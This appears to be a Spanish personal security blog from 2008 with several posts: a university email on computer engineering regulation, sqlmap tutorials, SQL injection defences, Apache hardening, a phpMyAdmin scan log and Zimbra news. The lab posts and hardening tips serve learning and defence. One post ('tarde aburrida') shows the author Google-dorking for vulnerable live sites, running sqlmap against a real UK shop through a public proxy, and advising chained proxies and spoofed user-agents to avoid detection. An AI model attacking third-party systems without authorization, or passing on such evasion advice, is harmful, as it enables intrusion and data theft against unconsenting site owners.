postura oficial de la uab

Este es el mail que ha enviado la UAB Informática a sus estudiantes. Yo soy de la UPC. La UPC no ha dicho aun nada, ni mail, ni mensaje en la web, nada de nada. Donde esta el apoyo a los estudiantes y ex-estudiantes de la Falcultad de Informática (FIB). ¿Tantos años estudiando y pagando para nada?.

--------------------------------------
From: Direcció ETS d'Enginyeria d.etse@uab.cat
Date: 2008/11/6
Subject: Informació d'interès per als alumnes d'Eng. Informàtica
To: xxx@neptu.uab.es

Benvolguts estudiants,

"Arran de les noticies que han anat apareixen al voltant del debat de la proposició no de llei del Congreso de los Diputados (28-10-2008) sobre la regulació de la professió d'Enginyer en Informàtica, que va desembocar en una votació en la que es va rebutjar la proposta per 17 vots favorables, 19 desfavorables i 2 abstencions; volem informar de la situació actual de les titulacions.

Els actuals títols d'Enginyer en Informàtica, Enginyer Tècnic en Informàtica de Gestió i Enginyer Tècnic en Informàtica de Sistemes, així com tots aquells que en el futur puguin aparèixer amb caràcter de títol universitari oficial de grau en Enginyeria Informàtica, tindran plena validesa en l'àmbit català, espanyol i europeu sense cap mena de restricció.

Tot i l'obstacle que ha suposat la votació del projecte no de llei esmentat, la Conferència de Degans i Directors dels centres universitaris que imparteixen les titulacions oficials d'informàtica segueixen treballant intensament per aconseguir el reconeixement, la regulació i les atribucions pròpies de la professió d'enginyer en informàtica.

La Direcció de l'Escola"
-------------------------

--------------------------
From: Direcció ETS d'Enginyeria d.etse@uab.cat
Date: 2008/11/6
Subject: Información de interes para los estudiantes de Ingenieria
To: xxx@neptu.uab.es

Queridos estudiantes,

A raíz de las noticías que han ido apereciendo alrededor del debate de la proposición no de ley del Congreso de los Diputados (28-10-2008) sobre la regulación de la profesión de Ingenieros en Informática, que desembocó en una votación en la que se rechazó la propuesta por 17 votos favorables, 19 desfavorables y 2 abstenciones; queremos informar de la situación actual de las titulaciones.

Los actuales títulos de Ingeniero en Informática, Ingeniero Técnico en Informática de Gestión e Ingeniero Técnico en Informática de Sistemas, así como todos aquellos que en el futuro puedan aparecer con carácter de título universitario oficial de grado en Ingeniería Informática, tendrán total validez en el ámbito catalán, español y europeo sin ningún tipo de restricción.

Todo y el obstáculo que ha supuesto la votación del proyecto no de ley mencionado, la Conferencia de Decanos y Directores de los centros universitarios que imparten las titulaciones oficiales de informática siguen trabajando intensamente por conseguir el reconocimiento, la regulación y las atribuciones propias de la profesión de Ingeniero en Informática.

La Dirección de la Escuela
--------------------------

¡¡¡ hijos de puta !!!

Todos a la huelga. Dia 19 de noviembre.

95.000 estudiantes.
81 centros de estudio, colegios o universidades.
200.000 informaticos titulados.
---------------------
1,6% del PIB, ¿todo a la mierda?

Noticia del elmundo.com

rulando sqlmap (remediando los problemas)

Continuación de "rulando sqlmap".

El problemón de poder acceder al directorio de passwords del servidor Linux o poder ver todos los usuarios mysql dados de alta es más jodido porque la inyección se ejecuta con permisos root que por la propia inyección.

Primero hay que dar los permisos adecuados a tu aplicación web para que ataque contra su propia base de datos y no tenga acceso al restos de bases de datos (como por ejemplo information_schema, MySQL u otras).

Por tanto, lo que haremos es crear un usuario especifico para la aplicación PHP y que sólo puede hacer consultas desde la propia localhost. Creamos un usuario “userdb_midb" con contraseña "123psw_midb_456":

mysql> GRANT select ON midb.* TO 'userdb_midb'@'localhost' identified 
by '123psw_midb_456';
mysql> FLUSH PRIVILEGES;

Otra recomendación importante es cambiar la contraseña que tiene el usuario root por defecto. No confundir el usuario root del mysql con el usuario root de Linux. Son usuarios, pero en contextos diferentes.

# mysqladmin -u root password "un_buen_password_para_root"

Ahora ya estamas listo para comenzar a programar tú aplicación web. Notar que los privilegios que hemos metido en la base de datos "midb" es solo para hacer consultas con SELECT. Si la aplicación PHP necesitara operaciones de DML (no operaciones DDL), lógicamente tendríamos que cambiar los permisos de tú mysql, pero siempre dando los mínimos que necesitemos:

mysql> GRANT select, insert, delete, update ON midb.* TO 'userdb_midb'@'localhost' 
identified by '123psw_midb_456';
mysql> FLUSH PRIVILEGES;

Comenzamos ahora a evitar las injecciones SQL. Hay mucha información por Internet sobre que son y como evitarlas así que no me extenderé. Si hablamos de aplicaciones web (PHP, ASP, python...), básicamente se trata de validaciones incorrectas de las variables que llegan al servidor ya sea por el método POST, GET, cookies, etc.

Lo que hay que tener claro es que no solo hay inyecciones de SQL, los hay de muchas cosas. Tenemos las inyecciones de xpath, las inyecciones de ldap, las inyecciones nulas... sea lo que sea, son provocadas por la mala validación de los datos de entrada. Como solo somos programadores web y no somos hackers pues tenemos que saber que existen y programar un poquito más para filtrar los datos que nos llegan.

La primera medida anti-sql-injection es modificar el php.ini con:

magic_quotes_gpc=On

Esta opción lo que hace escapar automáticamente todos los caracteres peligros. Estos caracteres que se consideran peligrosos con la comilla simple, la doble, la barra invertida y el NULL. Es importante saber que esta propiedad desaparece en PHP v6. En su lugar hay que escarpar los datos en tiempo de ejecución con la función addslashes().
Las magic_quotes son una primera medida de seguridad con PHP pero son evitables a cuanto inyección de SQL se refiere en algunos casos muy concretos según la base de datos que tengamos funcionando.

Por ejemplo un caso real (level 7 de Blindsec). Tenemos esta validación de usuario bajo un SQLlite:

$sql= 'SELECT * FROM users WHERE login="$login" and password="$psw" ';

Si ponemos como $login=admin e inyectamos el $psw=" or ROWID=1 --, tendremos el siguiente resultado:

SELECT * FROM users WHERE login="admin" and password="\" or ROWID=1 --"

De forma que siempre nos devolverá la fila=1. Este es un caso muy concreto y posible gracias a SQLlite.

Otras maneras que tenemos es convertir la clásica inyección ' or ''=' en:

%2527 or %2527%2527=%2527

También funciona:

%2527%20or%20%2527%2527=%2527

Si por defecto no tenemos las magic quotes activadas lo mejor es utilizar addslashes(). Según PHP v6 es lo que tendremos que utilizar y además mejora el rendimiento en vez de aplicar magic quotes en todos los valores. El problema es ir con cuidado de que no se nos escape ninguna variable sin aplicar addslashes(). Lo contrario de un addslashes() es un stripslashes().

También existe otra función para escapar los datos antes de construir la consulta SQL. Esta es mysql_real_escape_string() y es la que recomienda PHP.

mysql_real_escape_string($login);
mysql_real_escape_string($password);

He visto también que hay gente que escapea doblemente:

addcslashes(mysql_real_escape_string($login),'%_'));

Personalmente creo que lo mejor es crearte tú propia función para escapar o satanizar tus entradas:

   function sanitize($x, $quotes = true) {
      if (is_array($x))   
         foreach ($x as &$y)
            $y = sanitize($y);

      else if (is_string($x)) {
          $x = mysql_real_escape_string($x);
          if ($quotes)
             $x = "'". $x ."'";

        else if (is_null($x))
           $x = "NULL";

        else if (is_bool($x)) 
           $x = ($x) ? 1 : 0;

        return $x;
    }

Más cosas que he visto. Para los paranoicos totales, se podría modificar esta función para eliminar palabras prohibidas como "select", "insert", "password", etc. Aunque esto es fácilmente petable. Basta con poner "seLect", "inSert", o "pAssword". Otras modificaciones que podemos hacer es limitar la longitud de los datos que nos llegan. No a nivel de HTML o JavaScript, sino en el propio codigo de PHP. De esta forma si nuestro password es de longitud máxima de 10 caracteres será casi imposible inyectar con éxito un código de SQL.

Como he dicho antes, la inyección de SQL es muy amplia y no solo se aplica en las aplicaciones web en .php, .asp, .aspx, .py, sino también en cualquier servicio Web como puede ser SOAP.
Por ejemplo, imaginaros que tengo una aplicación que lee datos referentes al clima a través de llamadas SOAP a http://www.weather.gov/xml/. Teóricamente podemos pensar que www.weather.gov es una web confiable y que no nos inyectará código, ¿no?. Pero que pasaría si en vez de devolvernos la temperatura que hace en Barcelona capital, nos devuelve una inyección…. Malo malo.

Mas información:
+ SQL Injection cheat sheet
+ Securizar tú mysql para tus webs
+ PHP Filters

rulando sqlmap

Sqlmap es una tool de sourceforge creada para automatizar la inyección de SQL. Con esta tool podemos sacar usuarios, contraseñas, consultar en tablas, hacer modificaciones en tablas, leer archivos del sistema de archivos, etc.

Naturalmente todo lo que se pueda hacer dependerá del nivel de seguridad y las precauciones que el programador y administrador hayan tenido.

Como el objetivo no es buscar en Internet una Web vulnerable he creado una aplicación PHP que accede a una tabla de productos.
Esta Web no contiene ningún mecanismo de seguridad especial. Veremos como con sqlmap la aplicación está abierta de piernas y que podemos hacer para remediarlo.

Estos son los fuentes y las tablas (cópiatelos e instálatelos en tú Apache):

sqlinjection.zip
Otra cosa que necesitaras es sqlmap. Bájatelo e instálatelo. Existe una versión también para Windows que no necesita el intérprete de Python.

Una vez instalado los PHP y la base de datos, tendremos que suponer que hemos encontrado una URL que aparentemente es vulnerable:
http://[mi_servidor]/detail.php?id=8492019
Aparentemente no: !es vulnerable¡ porque la he programado yo. Si estás ansioso por encontrar webs, toma y busca.

Empezamos atacando la Web con sqlmap. Lo primero que haremos es ver que versión tiene de MySQL con el parámetro "-b":

# ./sqlmap.py -u "http://192.168.1.5/detail.php?code=8492019" -b

 sqlmap/0.6.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
                     and Daniele Bellucci <daniele.bellucci@gmail.com>

[*] starting at: 21:58:00

[21:58:01] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
back-end DBMS:  MySQL >= 5.0.0

banner:    '5.0.51b-community'


[*] shutting down at: 21:58:07

Vemos que tiene MySql 5.0.51. Ahora queremos saber el nombre de la base de datos con la que está trabajando esta aplicación. Utilizamos el parámetro "--current-db":

# ./sqlmap.py -u "http://192.168.1.5/detail.php?code=8492019" --current-db

 sqlmap/0.6.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
                     and Daniele Bellucci <daniele.bellucci@gmail.com>

[*] starting at: 22:09:07

[22:09:08] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
back-end DBMS:  MySQL >= 5.0.0

current database:    'midb'


[*] shutting down at: 22:09:09

La base de datos se llama midb. Veamos ahora las tablas de esta base de datos. Utilizamos los parámetros "--tables -D midb".

# ./sqlmap.py -u "http://192.168.1.5/detail.php?code=8492019" --tables -D midb

 sqlmap/0.6.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
                     and Daniele Bellucci <daniele.bellucci@gmail.com>

[*] starting at: 22:11:01

[22:11:02] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
back-end DBMS:  MySQL >= 5.0.0

Database: midb
[2 tables]
+----------+
| products |
| users    |
+----------+


[*] shutting down at: 22:11:05

Bingo!. Vemos que tiene una tabla llamada "users", donde posiblemente están lo usuarios que se logean desde la pagina principal llamada "login.php".

Veamos la estructura de esta tabla. Utilizamos los parámetros "--columns -T users -D midb":

# ./sqlmap.py -u "http://192.168.1.5/detail.php?code=8492019" --columns -T users -D midb

 sqlmap/0.6.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
                     and Daniele Bellucci <daniele.bellucci@gmail.com>

[*] starting at: 22:13:34

[22:13:35] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
back-end DBMS:  MySQL >= 5.0.0

Database: midb
Table: users
[3 columns]
+----------+------------------+
| Column   | Type             |
+----------+------------------+
| id       | int(10) unsigned |
| password | varchar(45)      |
| username | varchar(45)      |
+----------+------------------+


[*] shutting down at: 22:13:43

Veamos el contenido de esta tabla. Utilizamos los parámetros "--dump -T users -D midb":

# ./sqlmap.py -u "http://192.168.1.5/detail.php?code=8492019" --dump -T users -D midb

 sqlmap/0.6.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
                     and Daniele Bellucci <daniele.bellucci@gmail.com>

[*] starting at: 22:16:17

[22:16:19] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
back-end DBMS:  MySQL >= 5.0.0

Database: midb
Table: users
[3 entries]
+----+---------------+----------+
| id | password      | username |
+----+---------------+----------+
| 1  | admin123456   | admin    |
| 2  | alberto123456 | alberto  |
| 3  | juan123456    | juan     |
+----+---------------+----------+


[*] shutting down at: 22:16:27

Ahora la pregunta es saber si tenemos acceso a otras bases de datos. La respuesta es depende. Depende del nivel de seguridad que tenga la aplicación. Naturalmente esta aplicación es mía y no tiene ningún nivel de seguridad.

Veamos que otras bases de datos hay. Utilizamos "--dbs":

# ./sqlmap.py -u "http://192.168.1.5/detail.php?code=8492019" --dbs

 sqlmap/0.6.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
                     and Daniele Bellucci <daniele.bellucci@gmail.com>

[*] starting at: 22:31:25

[22:31:26] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
back-end DBMS:  MySQL >= 5.0.0

available databases [6]:
[*] information_schema
[*] midb
[*] mysql
[*] phpmyadmin
[*] test
[*] webauth


[*] shutting down at: 22:31:32

Veamos ahora que usuarios hay en MySQL. Utilizamos "--users":

# ./sqlmap.py -u "http://192.168.1.5/detail.php?code=8492019" --users

 sqlmap/0.6.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
                     and Daniele Bellucci <daniele.bellucci@gmail.com>

[*] starting at: 22:32:43

[22:32:45] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
back-end DBMS:  MySQL >= 5.0.0

database management system users [3]:
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'


[*] shutting down at: 22:32:51

Solo existe un usuario root. Aqui está uno de los problemas. Estamos utilizando el usuario root que trae por defecto MySQL para acceder por PHP. Si estamos utilizando el usuario root para nuestras sentencias de SQL eso quiere decir que podemos hacer llamadas al sistema:

# ./sqlmap.py -u "http://192.168.1.5/detail.php?code=8492019" --read-file /etc/passwd

 sqlmap/0.6.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
                     and Daniele Bellucci <daniele.bellucci@gmail.com>

[*] starting at: 22:59:10

[22:59:11] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
back-end DBMS:  MySQL >= 5.0.0

/etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/false
backup:x:34:34:backup:/var/backups:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
mysql:x:104:105:MySQL Server,,,:/var/lib/mysql:/bin/false


[*] shutting down at: 22:59:12

Para terminar tenemos un dump de todo el MySql. Utilizamos "--eta --dump-all -v 1". Esto puede tardar bastante y no volcaré el resultado.

En próximos post intentaremos solucionar estos problemas.

Más información:
+ Manual sqlmap
+ tarde aburrida
+ About SQL Injection Cheat Sheet
+ Inyeccion en la vida real (y otras cosas)

tarde aburrida

¿que hace uno después de limpiar el baño y ver la clasificación del gran premio del Brasil?, pues irse al ordenado y buscar alguna pagina vulnerable.

Cuando estuve en Bilbao en la asegur@it iii tenia delante mio un chaval de no más de 21 años con un libro de Anaya multimedia que decia Guia práctica Hackers, preguntándole al de la conferencia por qué el nunca encontraba ninguna web vulnerable a "1 or 1=1"... Al ponente de la conferencia se le quedo cara de poker (o maligno) y al final sonrió y le dijo "chaval si todo fuera tan fácil".

Así que veamos en cuanto tiempo tardo en encontrar una sola pagina vulnerable a "1 or 1=1". Hechemos mano de nuestro amigo google y buscamos:

inurl:list.php?id=
En 5 minutos pasando paginas por google he encontrado dos. Una es una tienda de accesorios para perros en Inglaterra y otra es un portal de juegos o revistas manga en Japón.

Ya se cual era el problema, si se hubiera gastado 20€ más se podría comprar el "Hacking con Google"... y si se da prisa le regalan el marcapagina de conejo. En el futuro no hay que menospreciar al chaval... porque toda la información está en internet y puede aprender.



Bueno como sigo muy aburrido y el blog del informático del mal no deja de decir tonterías ni escribir nada serio :), me he bajado la ultima versión del sqlmap del 20 de octubre (programa que alguien creo en mis mismas condiciones de aburrimiento).

Veamos que tal funciona con una de las url vulnerables que he encontrado. Preguntamos algo sencillito. ¿que versión de base de datos tienes?

# ./sqlmap.py -u "http://www.XXXX.co.uk/list.php?ID=1" 
--proxy=http://200.206.46.178:3128 -v 1

    sqlmap/0.6.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
                        and Daniele Bellucci <daniele.bellucci@gmail.com>

[*] starting at: 21:24:52

back-end DBMS:  MySQL < 5.0.0

Está muy bien, es versión moderna. Menos de 5. Veamos ahora con que usuario se hacen las conlsultas a la base de datos:

# ./sqlmap.py -u "http://www.XXXX.co.uk/list.php?ID=1" 
--current-user --proxy=http://200.206.46.178:3128 --dbms "MySQL" -v 1

    sqlmap/0.6.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
                        and Daniele Bellucci <daniele.bellucci@gmail.com>

[*] starting at: 22:06:14

current user:    'r8media_kelly@44.13.56.0/255.255.224.0'

[22:31:22] [INFO] Fetched data logged to text files under '/tmp/sqlmap-0.6.1/output/www.XXXXXX.co.uk'

[*] shutting down at: 22:31:22

Veamos ahora cual es el nombre de la base de datos con la que trabaja esta web:

# ./sqlmap.py -u "http://www.XXXX.co.uk/list.php?ID=1" 
--current-db --proxy=http://200.206.46.178 --dbms "MySQL" -v 1

    sqlmap/0.6.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
                        and Daniele Bellucci <daniele.bellucci@gmail.com>

[*] starting at: 23:04:20

current database:    'r9_database'

Observar que todas las peticiones que hago las hago con un proxy publico (de Brasil). Si alguien quisiera ir más allá (siempre con fines educativos) debería utilizar varios proxys encadenados tanto para utilizar sqlmap y las búsquedas por Internet. También estaría bien modificar el user-agent de las peticiones http, etc.

Nota: dicen que si lo haces con fines educativos o porque son deberes de tu profesor de aquitectura de redes, no te pasará nada.

Otro día utilizaré el sqlmap para reventar mi propia web+mysql... siempre con fines educativos.

Coño, la hora de preparar la cena...

Más información:
+ Quiero un proxy público
+ No tengo ni puta idea de que es esto de la injeción de SQL
+ ¿Hay más programas como sqlmap?

más de lo mismo: bueno, bonito... y caro

Dicen que es el nuevo Windows 7.


Dicen que esta versión podrá escalar hasta 256 procesodores...

truco o trato

¿quíen eres?

Una de las primeras cosas que hago antes de abrir el firewall es asegurarme que los servicios que publico en Internet no dejan entrever la versión con la que corren. Si es un apache: fuera mensaje de versión, si es un servidor de pop: fuera mensaje de versión, etc. Incluso se me ha ocurrido modificar el mensaje de la versión en aquellos servicios (como Postfix) que no dejan cambiarlo.


Para quien no se sepa de lo que hablo, la información con la versión es lo primero que se mira en busca de un bug... y posteriormente su exploit. Aquí tenéis un ejemplo de una aplicación LAMP


Como véis un simple GET de una página Web y la información que está dando:

Apache/2.2.9 (Win32) DAV/2 mod_ssl/2.2.9 OpenSSL/0.9.8h mod_autoindex_color PHP/5.2.6

Vamos pues a eliminar toda esta información extra. Para eliminar la información de la información en una aplicación LAMP/WAMP tenemos que modificar el archivo de configuración de Apache (httpd.conf) y el archivo de configuración de PHP (php.ini).

En httpd.conf buscaremos los parámentros ServerTokens y ServerSignature y los cambiaremos por estos valores:

ServerTokens Prod
ServerSignature Off

El php.ini buscaremos el parámetro expose_php y lo cambiaremos por el valor:

expose_php=off

Si reiniciamos nuestro servidor y probamos ahora veremos como ha cambiado la cosa:


Otra recomendación es no utilizar nunca los valores por defecto en las carpetas de instalación. Nunca utilizar carpetas como /admin o /phpadmin porque es lo primero que se prueba en busca de bugs.

Aquí teneis un ejemplo real de como una amigo maligno! esta buscando donde entrar:

[Tue Sep 23 13:17:54 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/phpmyadmin
[Tue Sep 23 13:17:55 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/phpMyAdmin
[Tue Sep 23 13:17:55 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/PHPMYADMIN
[Tue Sep 23 13:17:55 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/pHpMyAdMiN
[Tue Sep 23 13:17:55 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/PhPmYaDmIn
[Tue Sep 23 13:17:55 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/PHPmyadmin
[Tue Sep 23 13:17:55 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/PHPMYadmin
[Tue Sep 23 13:17:56 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/phpMYadmin
[Tue Sep 23 13:17:56 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/phpmyADMIN
[Tue Sep 23 13:17:59 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/pmamy
[Tue Sep 23 13:17:59 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/pma
[Tue Sep 23 13:18:02 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/PMA
[Tue Sep 23 13:18:03 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/myadmin
[Tue Sep 23 13:18:03 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/MYADMIN
[Tue Sep 23 13:18:03 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/MYadmin
[Tue Sep 23 13:18:03 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/myADMIN
[Tue Sep 23 13:18:03 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/MyAdmin
[Tue Sep 23 13:18:03 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/PMA
[Tue Sep 23 13:18:04 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/phpmyadmin
[Tue Sep 23 13:18:04 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/mysql
[Tue Sep 23 13:18:04 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/admin
[Tue Sep 23 13:18:04 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/db
[Tue Sep 23 13:18:04 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/dbadmin
[Tue Sep 23 13:18:05 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/web
[Tue Sep 23 13:18:05 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/admin
[Tue Sep 23 13:18:05 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/admin
[Tue Sep 23 13:18:05 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/admin
[Tue Sep 23 13:18:05 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/mysql-admin
[Tue Sep 23 13:18:08 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/phpmyadmin2
[Tue Sep 23 13:18:08 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/mysqladmin
[Tue Sep 23 13:18:09 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/mysql-admin
[client 193.41.180.240] script '/var/www/html/main.phpmain.php' not found or unable to stat
[Tue Sep 23 13:18:09 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/phpMyAdmin-2.5.6
[Tue Sep 23 13:18:12 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/phpMyAdmin-2.5.4
[Tue Sep 23 13:18:12 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/phpMyAdmin-2.5.1
[Tue Sep 23 13:18:13 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/phpMyAdmin-2.2.3
[Tue Sep 23 13:18:13 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/phpMyAdmin-2.9.1
[Tue Sep 23 13:18:13 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/phpMyAdmin-2.9.0
[Tue Sep 23 13:18:13 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/phpMyAdmin-2.9.0.2
[Tue Sep 23 13:18:13 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/phpMyAdmin-2.9.0.1
[Tue Sep 23 13:18:13 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/phpMyAdmin-2.8.2.4
[Tue Sep 23 13:18:13 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/phpMyAdmin-2.8.2.2
[Tue Sep 23 13:18:14 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/phpMyAdmin-2.8.2.1
[Tue Sep 23 13:18:14 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/phpMyAdmin-2.7.0-pl2
[Tue Sep 23 13:18:17 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/phpMyAdmin-2.7.0
[Tue Sep 23 13:18:17 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/phpMyAdmin-2.6.4-pl4
[Tue Sep 23 13:18:17 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/phpMyAdmin-2.6.4
[Tue Sep 23 13:18:17 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/phpMyAdmin-2.8.1
[Tue Sep 23 13:18:18 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/phpMyAdmin-2.2.6
[Tue Sep 23 13:18:18 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/phpMyAdmin-2.2.7
[Tue Sep 23 13:18:18 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/phpMyAdmin-2.2.7-pl1
[Tue Sep 23 13:18:18 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/phpMyAdmin-2.2.0 [Tue Sep 23 13:18:18 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/myadmin
[Tue Sep 23 13:18:19 2008] [error] [client 193.41.180.240] File does not exist: /var/www/html/phpmyadmin

Manón, estes donde estes...

feliz cumpleaños

Hoy cumple 10 años la lista de distribución de "una-al-dia". Empezó el 21/10/1998 y creo que yo en esa época estaba en la universalidad y ni tan solo sabía lo que era esto de las listas de distribución. En esa época leía yo el correo por un VAX. Es la primera lista de distribución a la que me suscribí cuando empecé a trabajar hace 7 u 8 años.

Así que felicidades!!!...

Este es el primer post de "una-al-dia" que anunciaba la salida del Service Pack 4 para NT... ufff NT cuanto tiempo ha pasado. Hasta hace poco he visto que los TPV de las tiendas Decathlon aun van con Windows NT.

Dicen que están preparando algunas sorpresa por este décimo aniversario. ¿tendrá que ver algo este texto aparentemente cifrado en su tarjeta de felicitación?

28/10/1998 Service Pack 4, los problemas de la solución.
Por fin ha salido el tan esperado Service Pack 4, y no es para menos si tenemos en 
cuenta que con este parche podremos corregir alrededor de 600 bugs del NT 4.0.
La solución de
Microsoft nos hará olvidar desde pequeños defectos hasta los tan usuales ataques DoS
(Denial of Service) y sus pantallas azules.

Además de poner fin a los agujeros conocidos, incluye nuevas aplicaciones y 
herramientas destinadas a aumentar la seguridad del sistema. Así nos podremos 
encontrar el Security Configuration Manager que nos facilitará, a golpe de ratón, la 
configuración de los parametros de seguridad de las aplicaciones y usuarios, hacer 
un seguimiento de los permisos ó programar auditorias.

Hasta aquí las buenas noticias, no han tardado en hacerse públicas pequeñas 
incompatibilidades con determinadas configuraciones hardware que están empañando su 
salida:

-Problemas con la tarjeta gráfica Number Nine Visual Technologies Imagine 2, que no 
puede superar la barrera de 256 colores al instalarse el SP4. Lo peor es que no 
podremos regresara resoluciones altas aunque volvamos al SP3.

-Perdida de los servicios sockets si tenemos instalado SystemSoft Card Wizard 3.x. 
Para volver a restaurarlos es necesario resintalar el Card Wizard 3.x despues del SP 
4.

-En los portatiles Dell Latitude con el Softex Advanced Power Managent versión 1.0 
necesitaremos actualizar a la version 2.19 ó superior si no queremos que el SP4 anule 
sus servicios.

-Incompatibilidad con las estaciones Silicon Graphics, tendremos que bajarnos software
adicional de http://support.sgi.com/nt antes de proceder a la instalación del SP 4.

-Problemas con el software Microsoft IntelliPoint Productivity Tips. Necesitaremos 
bajar la última versión del software en http://www.microsoft.com/products/hardware
/mouse.

-Incompatibilidad con los drivers ATIRage.

Para los afortunados en cuya configuración no se encuentren ninguno de los elementos 
anteriores les aconsejamos cuanto antes la instalación del SP 4, que podrán bajar 
en la direccion:
http://www.microsoft.com/ntserver/nts/downloads/recommended/nt4svcpk4/nt4svcpk4.asp

gunsNroses o zimbra 6

Me he estado dando una vueltecita por el "product portal" de Zimbra y me he enterado de algunas cosillas sobre la versión 6 (codename GunsNRoses). Quien no sepa lo que es el product portal, es una portal donde encontrará la historia de las versiones, así como las propuestas de mejoras y nuevas funciones (Request For Enhancement) que hacen los usuarios.

La primera beta de la 6 está prevista para enero 2009 y la versión final para marzo del 2009. Parece ser que se podrá disfrutar de la versión 5 hasta el path 5.0.11 (no tiene fecha de salida).

Hay muchos cambios para la versión open (tengo dudas que al final se hagan realidad), como el famoso conectar para outlook, el soporte para los calendarios de Google o el soporte para IE8 y Chome. Además habrá versiones para Fedora 10 y Ubunto 8.04.

Esta es la lista completa de cositas:

- Add files from Briefcase to mail
- Auto-complete from shared address books
- Run filters over an existing inbox
- Read receipts and delivery reports
- Support mandatory spell checks
- Auto-update ICS event URLs in calendar
- Web Client IE 8, Firefox 3, Safari 3x support
- Disaster recovery via server-to-server sync
- Role based delegated admin
- Permit hiding of aliases in the GAL on a per-alias basis
- Delete a message from multiple mailboxes
- Zimbra Mobile synchronize tasks
- BlackBerry administration within Zimbra Admin Console
- Outlook Connector sync performance
- Real-time updates when online
- Outlook Connector support single sign-on
- Outlook & iSync can be disabled by COS
- Zimbra Desktop GA including support for Yahoo/Google calendar, address book synch

¿para cuando Fedora 64 bits?, ¿para cuando CentOs?, ¿para cuando un buen conector Outlook?...